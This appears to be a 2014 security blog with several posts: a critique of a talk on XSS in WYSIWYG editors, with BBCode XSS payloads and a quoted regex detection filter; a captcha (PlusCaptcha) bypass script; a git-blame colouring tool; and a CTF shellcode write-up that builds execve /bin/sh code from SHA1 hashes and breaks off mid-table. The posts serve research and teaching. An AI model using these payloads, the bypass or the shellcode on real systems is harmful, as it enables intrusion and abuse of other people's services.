Some WYSIWYG editors create BBCode rather than HTML. But somewhere this BBCode has to be parsed and translated into HTML. And many people write regex parsers for that, which is a horrible idea. As langsec, the Chomsky hierarchy and many other examples have taught us, a context-free (Type-2) language like HTML cannot be recognized by a regular (Type-3) language, which is all a regex can describe. Thus we can exploit those flawed regex parsers.

Easy XSS could look like this:

[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]

But because of regex parsers, weird stuff like this can help you break out of attribute contexts etc.

[url=[img][/img]] onmouseover=alert(1) foo=bar[/url]after
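To see why the first payload works, here is a minimal Python sketch of such a regex-based BBCode translation. The pattern and the function names naive_bbcode and escaping_bbcode are made up for illustration and are not taken from any real editor or forum software.

```python
import html
import re

# Hypothetical [img] rule, the way a quick regex "parser" might implement it.
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]")

def naive_bbcode(text):
    """Paste the user-controlled URL into the attribute without any encoding."""
    return IMG_TAG.sub(r'<img src="\1">', text)

def escaping_bbcode(text):
    """Same rule, but the URL is HTML-escaped before it lands in the attribute."""
    return IMG_TAG.sub(
        lambda m: '<img src="{}">'.format(html.escape(m.group(1), quote=True)),
        text,
    )

payload = '[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]'
print(naive_bbcode(payload))     # the quote closes src and onerror becomes its own attribute
print(escaping_bbcode(payload))  # the quote is encoded, so everything stays inside src
```

Escaping the quote only stops the attribute breakout. A real implementation would presumably also have to validate the URL scheme, otherwise javascript: URLs still get through.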

Here is a post by @kkotowicz about XSS with the TinyMCE WYSIWYG editor bbcode plugin.

And I have also given a talk about hacking a browser game (in German) that includes this kind of attack.

The question now is: does Ashar Javed exploit the parser/sanitizer on the server? I'm not sure. I hope the XSS that earned him bug bounties were of this kind.

XSS Prevention

As far as I know, the consensus of the security community regarding XSS is that we need to encode output data based on where we put it. For example, the OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet gives us specific rules based on the context we want to put data in.
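As a small illustration of "encode based on the context", the following Python sketch encodes the same untrusted string once for an HTML context and once for a URL query parameter. It only uses the standard library and is not meant as a complete implementation of the OWASP rules; the variable names are made up.

```python
import html
from urllib.parse import quote

untrusted = '"><script>alert(1)</script>'

# HTML body or quoted attribute value: neutralise the markup metacharacters.
as_html = html.escape(untrusted, quote=True)

# URL query parameter: percent-encode everything except unreserved characters.
as_query = quote(untrusted, safe="")

print(as_html)
print(as_query)
```

The point is that the two outputs differ: an encoding that is correct for one context is not automatically correct for another.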

But WYSIWYG editors are a bit special, because websites that use them specifically want to allow certain HTML tags in user input. And this is a nontrivial task! But luckily other people have solved this for us already and there are projects like HTML Purifier or DOMPurify.

Evaluating Ashar Javed's solution

In his BlackHat briefing he promises us ...

... a sanitizer (very easy to use, effective and practical solution) which is based only on '11 chars + 3 regular expressions' and will show how it will safe you from an XSS in HTML, attribute, script (includes JSON context), style and URL contexts.

php xss filter

which seems to be this implementation, published by him in June/July this year.

php filter

It doesn't even make sense here, because we are talking about WYSIWYG, where we want to allow certain tags. But this filter just encodes everything (read: doesn't allow any tags). This doesn't help with any of the server-side parsing/purifying difficulties we have with complex HTML.

Additionally he publishes another solution - a javascript based filter. Does this help to prevent the client-side (self-xss) issues of all those WYSIWYG editors he exploited?

js xss filter

Nope. Of course not. This is what he does:

function test(string) {
    var match = /<script[^>]*>[\s\S]*?/i.test(string) ||
         /[\s"\'`;\/0-9\=\x0B\x09\x0C\x3B\x2C\x28]+on\w+[\s\x0B\x09\x0C\x3B\x2C\x28]*=/i.test(string)  ||
         /(?:=|U\s*R\s*L\s*\()\s*[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/i.test(string) || 
         /%[\d\w]{2}/i.test(string) ||
         /&#[^&]{2}/i.test(string) || 
         /&#x[^&]{3}/i.test(string) ||  
         /&colon;/i.test(string) ||
         /[\s\S]src[\s\S]/i.test(string) ||
         /[\s\S]data:text\/html[\s\S]/i.test(string) ||
         /[\s\S]xlink:href[\s\S]/i.test(string) ||
         /[\s\S]base64[\s\S]/i.test(string) || 
         /[\s\S]xmlns[\s\S]/i.test(string) ||
         /[\s\S]xhtml[\s\S]/i.test(string) || 
         /[\s\S]href[\s\S]/i.test(string)  || 
         /[\s\S]style[\s\S]/i.test(string) ||
         /[\s\S]formaction[\s\S]/i.test(string) ||
         /[\s\S]@import[\s\S]/i.test(string) || 
         /[\s\S]!ENTITY.*?SYSTEM[\s\S]/i.test(string) ||
         /[\s\S]pattern(?=.*?=)[\s\S]/i.test(string)  ||
         /<style[^>]*>[\s\S]*?/i.test(string) ||    
         /<applet[^>]*>[\s\S]*?/i.test(string) || 
         /<meta[^>]*>[\s\S]*?/i.test(string) || 
         /<form[^>]*>[\s\S]*?/i.test(string) ||
         /<isindex[^>]*>[\s\S]*?/i.test(string) ||
         /<object[^>]*>?[\s\S]*?/i.test(string);
    return match ? 'Filter has catch your awesome vector ... Try hard  :(' : 'Bypass :)';
}

This filter has so many false positives. I can't even write a simple text like: "do you know base64?". And yeah, it allows some tags like <b>bold</b>. But it doesn't solve the more difficult challenge that HTML purifiers face: allowing a lot of different tags with attributes, etc.
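The false positive is easy to reproduce. The sketch below ports three of the keyword patterns from the filter to Python's re module (search has the same "match anywhere" behaviour as JavaScript's test()); the helper name is_blocked is made up for this example.

```python
import re

# Three of the keyword patterns from the filter, ported to Python's re syntax.
PATTERNS = [
    re.compile(r"[\s\S]base64[\s\S]", re.IGNORECASE),
    re.compile(r"[\s\S]style[\s\S]", re.IGNORECASE),
    re.compile(r"[\s\S]src[\s\S]", re.IGNORECASE),
]

def is_blocked(text):
    """True if any of the ported patterns matches somewhere in the text."""
    return any(pattern.search(text) for pattern in PATTERNS)

for sample in ("do you know base64?", "I like your style!", "<b>bold</b>"):
    print(repr(sample), "->", "blocked" if is_blocked(sample) else "allowed")
```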

filter false positive

It's another "solution", which in reality is not a solution.

As I mentioned, I haven't watched his talk, but based on the slides it seems like he even makes fun of what the developers say. But I have to agree with them (see 2.1 Output not properly sanitized), because an attacker can pass any input to the server. It doesn't matter what the capabilities of a WYSIWYG editor are.

developer comments

My conclusion

Ashar Javed is not very clear about what he actually did. I believe most of his XSS were just self-XSS. And even if it was more than that (see my overview 1. - 2.), it is still old and known stuff.

Besides that, the "solutions" he provided are not solutions for his issues. Neither on the server-side nor on the client-/editor-side do they sanitize/purify HTML to allow harmless tags -> which is the real challenge.

I mean it's not necessarily wrong what he says. It just doesn't make a lot of sense in this context and it's not really new.

It could be a nice paper if it included which parts he actually exploited, so that WYSIWYG editor (and backend) developers can actually learn from the mistakes of others.

In the end I don't understand how this got accepted by the BlackHat EU reviewers...

Now I want to finish with the quote of a friend:

If you wrap it into a confusing cloud of half-true content you can get quite far


To keep it fair Ashar Javed received this article as a draft to be able to comment about it beforehand. He also gave the permission to publish his answers here, which is great for transparency.

I will not make any additional comments to what Ashar replied, because in my opinion it doesn't change anything about what I said above.

.mario sends the following email to Ashar:

Hello Ashar,

we had a look at your BlackHat presentation and paper and developed doubts about its content and reasoning.

We discussed it internally and couldn't arrive at a point where it all makes sense. That holds for both the attacks as well as the proposed defense.

We will publish a written criticism very soon but wanted to give you a chance to preview and comment this. [...]

While not written by me, I agree with all mentioned in there and believe it is right.

Your comment on that is welcome.


Ashar Javed answers:


I can give you a point-wise or line-by-line feedback but for this I need more time.

The case study about WYSIWYG editors is a general study and it includes server-side, client-side and different programming languages WYSIWYG editors (in PHP. ASP, Rails, JavaScript and JQuery-based etc). I discussed the results in general and they are not specific to client or server side.

It is a debatable issue that client-side sanitization will be there or not ... I found Froala WYSIWYG editors developers were very keen in sanitizing stuff on the client side but on the other hand CKEditor developer said to me that it is a server-side problem. I used developers' comments in the slides not for FUN but I wanted to convey that developers of WYSIWYG editors want server-side sanitization while developers of server-side web applications take the product and start using it without adding sanitization stuff which makes the sites vulnerable. I had given examples of Twitter, CNET, Ebay etc ...

Fabian had written that bug in Tiny-MCE is not even worth reporting but my question is that why developers are keen in fixing it quickly ... For my 1000 USD bounty from Magento (BB-code in use), as far as I know, everything is happening on the server-side and for me it was a black-box text.

Down below I will try to make some points clear so that you will have a better understanding of the slides. I think the confusion arise because you had seen:

and then jump to the conclusion.

This was a demo where for the sake of demo, I used the client-side code and the regular expressions are in JavaScript.

What I had in my mind and what I wanted to convey and conveyed i.e., "see this filter for harmless tags" is still holds true if you will use the same regular expressions on the server-side.

This filter allows very simple tags like bold,, italic etc. It does not allow links and images. If you look at the Facebook's WYSIWYG editor (I really liked because it is very simple) which is available at: and I mentioned in the slides also:

It also allows simple tags without images and links. The pro of my filter (if used on server-side) is that it is open-source (since last two and half years because it is part of ModSecurity Core Rule Set also) though suffers from false positives (which is a common problem in filtering solutions). Facebook's WYSIWYG editor is not open-sourced but very good in a sense that it has no false positives ... In comparison, there is a trade-off.

The demo is not a final solution for WYSIWYG editors. It is just one potential solution that developers may use (use this on server-side).

Now discuss second potential solution (not a complete) but bits and pieces can be used by the WYSIWYG editors' developers. As an academia, we proposed different prototype solutions ... you also know that.

In a recent work, I had developed a per-context server-side filter or encoder which is based on minimalistic encoding of meta or trigger characters. It is a complete solution for an XSS protection in five contexts and I achieved the results with only 11 characters and 3 regular expressions in total. It supports five contexts, HTML, attribute, style, URL and script. I had developed the solution by keeping in mind XSS not WYSIWYG editors ...

But by keeping in mind WYSIWYG editor's functionality, as a developer one can leverage the code from three contexts that are also part of most WYSIWYG editors ...

  • attribute
  • style
  • URL

If you are a WYSIWYG editor developer and wants to allow users of WYSIWYG editors to set some attributes like id, class then you can use a function proposed attributeContextCleaner (see

In a similar manner, if you want to allow styling then you can use styleContextCleaner. Fabian had written that it encodes everything ... No. It only controls six characters that are necessary to execute JavaScript in style context. At the same time, it allows simple styling which I assume WYSIWYG editors want to offer (see One can also cut short six control characters into five characters if you know that you will be only using double quotes through-out your code then no need to control single quote in style context and vice-versa. Can be further shorten to four characters if you as a developer are sure that you will be using only style attribute not style tag then remove < from the list ...

For URL, if you are a WYSIWYG editor developer then I had written 3 regular expressions that only allow harmless URLs and do not allow JavaScript, Data and VbScript URI. I had discussed one out of three regular expression here: The other two regular expressions deals with mailto: and relative URI etc.

Because script context is not part of WYSIWYG editor's functionality and that's why I omitted scriptContextCleaner from the slides.

The challenge related to these 11 characters plus 3 regular expression is still online and so far 82K XSS attack attempts failed ... I had shown the logs in the presentation at Black Hat.

Take away for this second solution:

"No matter how you will code your WYSIWYG editor but if your WYSIWYG editor supports above three contexts then YOU MAY LEVERAGE MY CODE WHICH IS UNBREAKABLE and perfectly suites/fits (at least I think) in three contexts ..." My assumption is that even if they have some sort of sanitization then it may be flawed. Mine functions are thoroughly tested by the community and so far flawless ... (no one is able to XSSed these). They can use my functions as a replacement only for their sanitization routines ...

I hope it helps.

After this initial exchange .mario asks a few specific questions:

a) You say your filter is flawless and ready for deployment against XSS?
  • From: sanitization then it may be flawed. Mine functions are thoroughly tested by the community and so far flawless ... (no one is able to XSSed

So far flawless. But I can not guarantee about the future ... As far as deployment is concerned, it has already been deployed as an extension for Symphonycms: There are other products also. Once paper (under submission) will be accepted, all names will be public.

b) You say that if no server side validation is being used, the client side validation/sanitation will help?
  • From: [...] that developers of WYSIWYG editors want server-side sanitization while developers of server-side web applications take the product and start using it without adding sanitization stuff which makes the sites vulnerable.

Yes & No. It is debatable....

c) Existing XSS filters commonly introduce false alerts
  • From: (which is a common problem in filtering solutions)

Yes. see this also: This paper discussed NoScript's false positives ...

d) Given you referenced the way academia works: Do you consider your work to be novel? You mentioned a proposed solution. Are you the first proposing this? I am asking these questions to get an understanding of what you mean and what the background of the presentation and publication is.

I see novelty ...

1) You were the first in literature who proposed a particular type of solution

2) Improvement over existing work ...

My proposed sanitization solution lies in (2) because there are already solutions like OWASP Java Encoder but mine solution is improved in a manner because I did the job with far less number of characters ...

The black hat talk is related to the case study of looking at XSSes in WYSIWYG editors.

e) Do you mind if we publish your replies in our article?

You can post my replies given not tweaked.


Posted on Tue 14 October 2014 in posts • Tagged with script, python, captcha, security

First of all, this research is legit because I have a logo and a name for it. This seems to be a trend right now (heartbleed, shellshock, sandworm). Afaik the rule is that you must invest the same time into creating the logo as you did in your research.

Creating a captcha system is not as easy as it seems. Even if your captcha system doesn't have any implementation errors or logic flaws, you are still fighting against advanced research in image/voice recognition. That's almost like creating your own crypto.

But if you have expected some crazy new algorithm, I have to disappoint you. It's just another design flaw.

crossed captcha logo

So this post is about yet another broken captcha, and if you are not interested in the technical part, just make sure you remember this:

I promise I will never make my own captcha system.
I promise I will never make my own captcha system.
I promise I will never make my own captcha system.
I promise I will never make my own captcha system.
I promise I will never make my own captcha system.

But let's not beat around the bush for too long. You are reading this because you are interested in what this scary CrossedCaptcha is all about, right?

The captcha system I'm talking about is called PlusCaptcha, which you can use as a standalone script or WordPress plugin. For some reason it's even ecological!

pluscaptcha ecology

How did I come up with CrossedCaptcha? Well, a plus (+) and a cross (✝) are very similar. I know that crossed isn't technically crucified, and it makes it less funny, but whatever. You are here because you are interested in the exact vulnerability and you want to know how it's done. And you have read enough technical blah blah articles anyway.

So let's dive in...

This is what the PlusCaptcha looks like. You have to turn the circle to match the background image.


It's an embedded iframe. This particular instance has the id 42906365. Every time the iframe URL is loaded, a new captcha with a different solution is generated.

When you adjust the circle, the iframe sends a POST request with the data grados=-90&iduso=%d&size=c&green=0, where grados is the rotation of the picture in degrees. It does this for every adjustment you make.

The following code is the PHP backend check for whether the captcha you entered is correct. It does this by requesting /r?iduso=<id> from the captcha server:

$host = '';
$resultado_ejecucion = @fgets(@fopen('http://'.$host.'/r?iduso='.$datosent[0]. '', 'r'), 4096);
// Acertar si acertó con el captcha | engl.: Hit if hit with captcha
if($resultado_ejecucion) {
    return true;
} else {
    return false;
}

Now you would expect that once you have asked the server whether the captcha you previously entered was correct, it would void this particular captcha.

But it doesn't.

So you can just "adjust the circle" and ask if it was correct until you find the correct position and then submit your form.

A bit of testing has also shown that you have a tolerance of around 50-70 degrees:

degree 148-219 are correct (70 degree tolerance)
degree  98-169 are correct (70 degree tolerance)
degree 177-226 are correct (50 degree tolerance)
degree 255-304 are correct (50 degree tolerance)

So you only have to test a handful of numbers to crack the captcha:

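import urllib2
def solve(iduso):
    for i in range(0, 360, 50):
        # POST the new rotation of the circle (endpoint URL elided) ...
        urllib2.urlopen("",
                        "grados=-%d&iduso=%d&size=c&green=0" % (i,iduso)).read()
        # ... then ask the check endpoint (URL elided) if this rotation is accepted
        if urllib2.urlopen("" % iduso).read() == '1':
            return i
    return 'fail'
print solve(42906365)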

A simple solution would be to void the captcha after the server has checked it once. But then you still have a ~14%-20% chance of being correct just by guessing. And because there is only a limited number of pictures, you can easily pre-solve them anyway. Besides that, this implementation is also not barrier-free.
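The numbers can be checked without touching the real service. The following Python sketch models the captcha as an oracle that accepts a window of consecutive degrees and can be asked as often as you like; make_captcha is a made-up stand-in for the server, not its real logic.

```python
import random

def make_captcha(tolerance, rng=random):
    """Hypothetical oracle: accepts `tolerance` consecutive degrees and never expires."""
    start = rng.randrange(360)
    accepted = {(start + k) % 360 for k in range(tolerance)}
    return lambda degree: degree % 360 in accepted

def solve(check, step=50):
    """Probe every `step` degrees; returns (angle, probes used), angle is None on failure."""
    probes = 0
    for degree in range(0, 360, step):
        probes += 1
        if check(degree):
            return degree, probes
    return None, probes

for tolerance in (50, 70):
    worst = max(solve(make_captcha(tolerance))[1] for _ in range(10000))
    print(tolerance, "degree window: worst case", worst, "probes,",
          "blind guess chance %.1f%%" % (100.0 * tolerance / 360))
```

With a window of at least 50 degrees, probing in steps of 50 always hits an accepted angle within 8 requests, and a single blind guess succeeds with probability window/360, which is where the ~14%-20% comes from.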

If I had to suggest a captcha solution, then it would be reCaptcha...

Code Archeology (Updated)

Posted on Thu 18 September 2014 in posts • Tagged with script, python, code audit

One day I thought about different techniques for source code analysis, especially since we often have access to repositories and thus to the evolution of the code.

Wouldn't it be cool to see the age of certain lines of code relative to others? So I decided to create a PoC Sublime Text plugin to visualize the age of lines. I call this method Code Archeology.

And here is the result. This is the normal syntax highlighting:

code archeology normal

And this is an example which highlights the oldest parts of the code and darkens the newer lines:

code archeology visualized

Update 2014-09-24:

So it turns out that somebody already thought about Code Archeology long before me - John Firebaugh - Code Archaeology With Git. Maybe I have even read this article years ago, forgot about it, and subconsciously "created" it in my head again.

And it gets worse. GitHub already has colors to indicate older and newer files.

GitHub Blame Color Encoding

But GitHub has only 10 different colors and the narrow column doesn't really transmit the information. So to finally do something "useful" I have created a small JavaScript snippet, which you can copy into the developer console.

It parses the <time> tag of each commit and assigns colors to each line. It also removes some of the commit info to have a bigger view on the code.

GitHub Blame Color PoC


var color_range=205;nextSibling=function(e){if(e){e=e.nextSibling;while(e&&e.nodeType!=1){e=e.nextSibling}return e}};var all_lines=[];$.each($(".blame-commit time"),function(e,t){var n=new Date(t.getAttribute("datetime"));var r=t.parentNode.parentNode.parentNode;var i=r.getAttribute("rowspan")-1;var s=Array();var o=nextSibling(r.parentNode);while(o&&i>0){i--;s.push(o);o=nextSibling(o)}all_lines.push({datetime:n,lines:s})});all_lines.sort(function(e,t){return t.datetime-e.datetime});var bucket_size=all_lines.length/color_range;$.each(all_lines,function(e,t){col=Math.floor(e/bucket_size+(255-color_range)/2);$.each(t.lines,function(e,t){"rgb("+col+","+col+","+col+")"})});$(".commit-info img").remove();$(".commit-body").remove();$(".commit-info").css({width:"70px","min-width":"70px"})
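The color assignment in the minified snippet is easier to follow when written out. Here is a Python sketch of the same arithmetic (sort by commit time, newest first, then spread the ranks over color_range grey levels); the function name assign_grey_levels and the plain list of timestamps are assumptions made for this example.

```python
import math

def assign_grey_levels(commit_times, color_range=205):
    """Map each entry index to a grey level; the newest entry gets the darkest value."""
    # Rank the entries from newest to oldest, like the sort in the snippet.
    order = sorted(range(len(commit_times)),
                   key=lambda i: commit_times[i], reverse=True)
    bucket_size = len(order) / color_range
    offset = (255 - color_range) / 2
    return {index: math.floor(rank / bucket_size + offset)
            for rank, index in enumerate(order)}

levels = assign_grey_levels([1404753962, 1404754156, 1404754000])
for index, level in sorted(levels.items()):
    print(index, "rgb(%d,%d,%d)" % (level, level, level))
```

With the default color_range of 205 the grey values stay between 25 and 229, so neither pure black nor pure white is used.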

You can stop reading here, or continue if you are interested in my original crappy Sublime Text Plugin solution...

I don't really know if it will be useful in the future. But it's already fun to look over code with it. Here, for example, are two excerpts from OpenSSL's t1_lib.c.

Here you can see how over time more and more else ifs got added. Remember - the lighter the color, the older the code.

code archeology visualized

And here you can see that a comment was written very early, while the code changed.

code archeology old_comment

How it works

At first I created a small test repository with a simple file and a few changes. With git blame --line-porcelain -w <file> you can get the commit of each line, which can then be parsed by a Python script.

e04094852bd6b19b7c7fc0b4651d7299d3bb004e 1 1 3
author samuirai
author-time 1404753962
author-tz +0200
committer samuirai
committer-time 1404753962
committer-tz +0200
summary added MAX_NAME and missing #include
previous 5643cc394796389ed698ba17603da208466b06f0 test.c
filename test.c
    #include <stdio.h>
e04094852bd6b19b7c7fc0b4651d7299d3bb004e 2 2
author samuirai
author-time 1404753962
author-tz +0200
committer samuirai
committer-time 1404753962
committer-tz +0200
summary added MAX_NAME and missing #include
previous 5643cc394796389ed698ba17603da208466b06f0 test.c
filename test.c
    #define MAX_NAME 50
e04094852bd6b19b7c7fc0b4651d7299d3bb004e 3 3
author samuirai
author-time 1404753962
author-tz +0200
committer samuirai
committer-time 1404753962
committer-tz +0200
summary added MAX_NAME and missing #include
previous 5643cc394796389ed698ba17603da208466b06f0 test.c
filename test.c

e60aa7d9ece183db73d5728e6f5c8ebd6a9f2261 4 4 1
author samuirai
author-time 1404754156
author-tz +0200
committer samuirai
committer-time 1404754156
committer-tz +0200
summary fixed argc spelling error
previous 7cb68460a085d9535d9d27746ec9879180796b54 test.c
filename test.c
    int main(int argc, char **argv) 
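Parsing this output takes only a few lines. The following is a minimal Python sketch, not the code of the plugin: it relies on the porcelain format putting a header line (sha, original line, final line) in front of every entry and a TAB in front of the actual line content. The function name parse_line_porcelain is made up.

```python
import re

# Header line of each entry: <40 hex sha> <orig line> <final line> [<lines in group>]
HEADER = re.compile(r"^([0-9a-f]{40}) (\d+) (\d+)(?: (\d+))?$")

def parse_line_porcelain(text):
    """Return a list of (final_line_number, commit_sha, author_time) tuples."""
    result = []
    sha = final_line = author_time = None
    for raw in text.splitlines():
        match = HEADER.match(raw)
        if match:
            sha, final_line = match.group(1), int(match.group(3))
        elif raw.startswith("author-time "):
            author_time = int(raw.split(" ", 1)[1])
        elif raw.startswith("\t"):
            # The content line closes the entry for this source line.
            result.append((final_line, sha, author_time))
    return result
```

The input text could come from something like subprocess.check_output(["git", "blame", "--line-porcelain", "-w", path], text=True). Sorting the resulting tuples by author_time gives the age order needed for coloring.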

Now I need to group them together and assign them a color. Unfortunately this gets really ugly in Sublime :( To create a colored line I have to generate a theme on-the-fly with differently colored regions and assign them to the corresponding age groups afterwards:


Then I have to go through all my lines with Sublime views and add the corresponding region to it.

There are quite a few cons to my method. First of all, you can only look at one file at a time. Because the theme is always generated on-the-fly based on the number of groups I have, it will change the look of other open files that share the same dynamic theme. The generation is also slow: a file with ~5k LOC takes over 10 seconds.

I think that visualizing the age of code can be very useful, but somebody has to come up with a better idea how to implement it.

The PoC plugin can be downloaded here. Place the script in ~/Library/Application Support/Sublime Text 3/Packages/User. Then open a file in a git repository, press ctrl+` to open the console and run it with view.run_command("example"). To reset the view use view.run_command("example", {'reset': True}). But this should never ever ever be used by anybody. It's buggy and will probably only work on my machine. I just don't want to hold back any information.

HITCON CTF 2014 - sha1lcode

Posted on Mon 18 August 2014 in posts • Tagged with ctf, hitconctf2014


The name of the challenge, sha1lcode, already hints at the overall idea: writing shellcode that has something to do with SHA1 hashes.

So let's have a first look at the provided binary file:

$ file sha1lcode-5b43cc13b0fb249726e0ae175dbef3fe
sha1lcode-5b43cc13b0fb249726e0ae175dbef3fe: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped

The following call tree image is generated with Hopper

sha1lcode calltree

Hopper can also generate some pseudo C code, which I have cleaned up a little bit and renamed variables:

    function main {
        read(0x0, &input_size, 0x4);
        if (input_size > 0x3e8) {
                rax = exit(0x0);
        }
        else {
                i = 0x0;
                while (input_size*16 > i) {
                        anz_chrs = read(0x0, input_data+i, (input_size*16)-i);
                        i = anz_chrs+i;
                }
                j = 0x0;
                while (j < input_size) {
                         SHA1((j*16) + input_data, 0x10, (j*8 + j*8) + code);
                        j = j + 0x1;
                }
                memset(input_data, 0xffffffff, 0x3e80);
                rax = (code)();
                return 0x0;
        }
        return rax;
    }

At the start of the function you can see a read() of 4 bytes and a first check afterwards, which exits the application if the 4-byte value you entered is bigger than 0x3e8 (1000). If this check is passed, the entered value input_size is used in the while loop to read() input_size*16 bytes into input_data. After this loop is completed, input_data is hashed in 16 byte chunks with SHA1() and the hashes are written into code. At the end the original input_data is overwritten with 0xffffffff and the program jumps to the code data.

So the data we input in the loop, gets hashed in 16 byte chunks with SHA1 and then we jump to those hashes. Now it's clear what we have to do - we have to generate SHA1 hashes with valid x86-64 opcodes.

This is a bit of crappy C code to bruteforce hashes with specific values.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/sha.h>

void gen_random(char *s, const int len) {
    static const char alphanum[] =
        "0123456789"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz";

    for (int i = 0; i < len; ++i) {
        s[i] = alphanum[rand() % (sizeof(alphanum) - 1)];
    }

    s[len] = 0;
}

int main()
{
    int max = 32; // generate max. 32 hashes with the searched values
    unsigned char ibuf[20];
    unsigned char obuf[20];
    for(;;) {
        // get a random string
        gen_random((char *)ibuf, 0x10);

        // hash the random string
        SHA1(ibuf, 0x10, obuf);

        // check if we got a hash with the opcode(s) we want.
        // enable exactly one of the following conditions per run:
        //if(obuf[17]==0x48 && obuf[18]==0x09 && obuf[19]==0xcb ) { // or rbx, rcx
        //if(obuf[18]==0xb1 && obuf[19]==0x96 ) {                   // mov cl, 0x96
        //if(obuf[0]==0xeb && obuf[1]==35 ) {                       // jmp +35
        if(obuf[0]==0x31 && obuf[1]==0xc0 ) {                       // xor eax, eax
            printf("%s sha1(",ibuf);
            for(int i = 0; i < 20; i++) {
                printf("%02x", obuf[i]);
            }
            printf(")\n");
            return 0;
        }
    }
    return 0;
}
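The same search can be sketched in a few lines of Python with hashlib. This is not the tool used during the CTF, just an equivalent illustration; the function name find_chunk and its parameters are made up.

```python
import hashlib
import random
import string

ALPHANUM = string.digits + string.ascii_letters

def find_chunk(pattern, offset, length=16, rng=random):
    """Try random alphanumeric inputs until the SHA-1 digest contains
    the bytes `pattern` starting at digest index `offset`."""
    end = offset + len(pattern)
    while True:
        candidate = "".join(rng.choice(ALPHANUM) for _ in range(length)).encode()
        digest = hashlib.sha1(candidate).digest()
        if digest[offset:end] == pattern:
            return candidate, digest

if __name__ == "__main__":
    # xor eax, eax (31 c0) at the very beginning of the digest
    chunk, digest = find_chunk(b"\x31\xc0", 0)
    print(chunk.decode(), "sha1(" + digest.hex() + ")")
```

Every additional byte in the pattern multiplies the expected number of attempts by 256, which is why two or three bytes are found quickly while a 10 byte opcode is out of reach.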

Now that we have a little tool to generate hashes with opcodes we have to come up with a general idea to fit the shellcode into the hashes:

sha1lcode opcodes

The program jumps to the start of the first hash, where there is a jump to the end of the 2nd hash. At the end of the 2nd hash the shellcode starts with its first instruction(s). The beginning of the hash after that will be another jump to the end of the following hash.

So generally we have in the beginning of one hash a jump to the end of the next hash, which will contain one or more shellcode opcodes. This way we can execute anything we want...

And this is the shellcode I used:

xor eax, eax
mov rbx, 0xFF978CD091969DD1
neg rbx
push rbx
;mov rdi, rsp
push rsp
pop rdi
push rdx
push rdi
;mov rsi, rsp
push rsp
pop rsi
mov al, 0x3b

The only problem is the length of the opcodes. It was fairly fast to bruteforce up to three bytes. But I had to get the long string /bin/sh into a 64-bit register, and the 10 byte opcode is too long to bruteforce.

48BBD19D9691D08C97FF: mov rbx, 0xff978cd091969dd1

So I had to split this up in smaller opcodes:

mov   bl, 0x97
mov   bh, 0xff
shl  ebx, 0x10
mov   bh, 0x8c
mov   bl, 0xd0
shl  rbx, 0x20
mov   ch, 0x91
mov   cl, 0x96
shl  ecx, 0x10
mov   cl, 0xd1
mov   ch, 0x9d

Which is almost perfect, but the shl on rbx still needs 4 bytes:

48C1E320: shl rbx, 0x20

But because 3 bytes can be bruteforced easily and the jmp only needs 2 bytes, we can bruteforce 3 bytes at the end of one hash and 3 bytes at the beginning of the next hash to match opcode (4 bytes) + jump (2 bytes) = 6 bytes.
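As a sanity check that the split-up instructions really produce the same value as the single 10 byte mov, the register operations can be simulated in Python. This is only a model of the 8-, 32- and 64-bit register semantics; the helper names are made up, and the final or rbx, rcx and neg rbx steps are the ones listed in the chunk table.

```python
MASK64 = (1 << 64) - 1
MASK32 = (1 << 32) - 1

def set_low(reg, value):    # mov bl/cl, imm8
    return (reg & ~0xFF) | value

def set_high(reg, value):   # mov bh/ch, imm8
    return (reg & ~0xFF00) | (value << 8)

def shl32(reg, count):      # shl ebx/ecx, imm8: 32-bit result, zero-extended to 64 bit
    return ((reg & MASK32) << count) & MASK32

def shl64(reg, count):      # shl rbx, imm8
    return (reg << count) & MASK64

def build_rbx(rbx=0, rcx=0):
    rbx = set_low(rbx, 0x97)
    rbx = set_high(rbx, 0xff)
    rbx = shl32(rbx, 0x10)
    rbx = set_high(rbx, 0x8c)
    rbx = set_low(rbx, 0xd0)
    rbx = shl64(rbx, 0x20)
    rcx = set_high(rcx, 0x91)
    rcx = set_low(rcx, 0x96)
    rcx = shl32(rcx, 0x10)
    rcx = set_low(rcx, 0xd1)
    rcx = set_high(rcx, 0x9d)
    rbx |= rcx                  # or rbx, rcx
    return (-rbx) & MASK64      # neg rbx

print(build_rbx().to_bytes(8, "little"))
```

Because the 32-bit shifts push out whatever was in the registers before, the result does not depend on the initial values of rbx and rcx.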

In the end we can split up the shellcode like this:

  original text         opcode in the sha1 hash
ikLEsXBe58oJIuFL : (start) jmp 2
CYOEsiM5zOvynLcZ :   (end) xor eax, eax
EI6Tlq7y76Vh5hyN : (start) jmp 2
S61SFzdOBn3zyrBf :   (end) mov bl, 0x97
EI6Tlq7y76Vh5hyN : (start) jmp 2
zihgN1OfifVotOPs :   (end) mov bh, 0xff
qzg3NxCyYGweMVIr : (start) jmp 3
czbdI1dngWv4nbYv :   (end) shl EBX
EI6Tlq7y76Vh5hyN : (start) jmp 2
UqZhIrIoQrZu29qM :   (end) mov bh
EI6Tlq7y76Vh5hyN : (start) jmp 2
gMq4RKcD34SOoMpk :   (end) mov bl
qzg3NxCyYGweMVIr : (start) jmp 3
j90mqufCQHUY7DFI :   (end) part shl
BkrI3NqemVnl6iq2 : (start) part shl and jmp 2
l05Y1tnrwjQGa9GB :   (end) mov ch, 0x91
EI6Tlq7y76Vh5hyN : (start) jmp 2
mqKoGcLyK8fi3kSH :   (end) mov cl, 0x96
qzg3NxCyYGweMVIr : (start) jmp 3
hVoED3xi4I5kTghS :   (end) shl ECX
EI6Tlq7y76Vh5hyN : (start) jmp 2
70hQz3yujDwrWyEi :   (end) mov cl, 0xd1
EI6Tlq7y76Vh5hyN : (start) jmp 2
JcGdue7SlbVZ2lpg :   (end) mov ch, 0x9d
qzg3NxCyYGweMVIr : (start) jmp 3
XJodA3GFNyfC5mp1 :   (end) or rbx, rcx
qzg3NxCyYGweMVIr : (start) jmp 3
CzoXGfRlsiDKfS4H :   (end) neg rbx
qzg3NxCyYGweMVIr : (start) jmp 3
fgnxUdbfK3yemOIH :   (end) push rbx, push rsp, pop rdi
qzg3NxCyYGweMVIr : (start) jmp 3
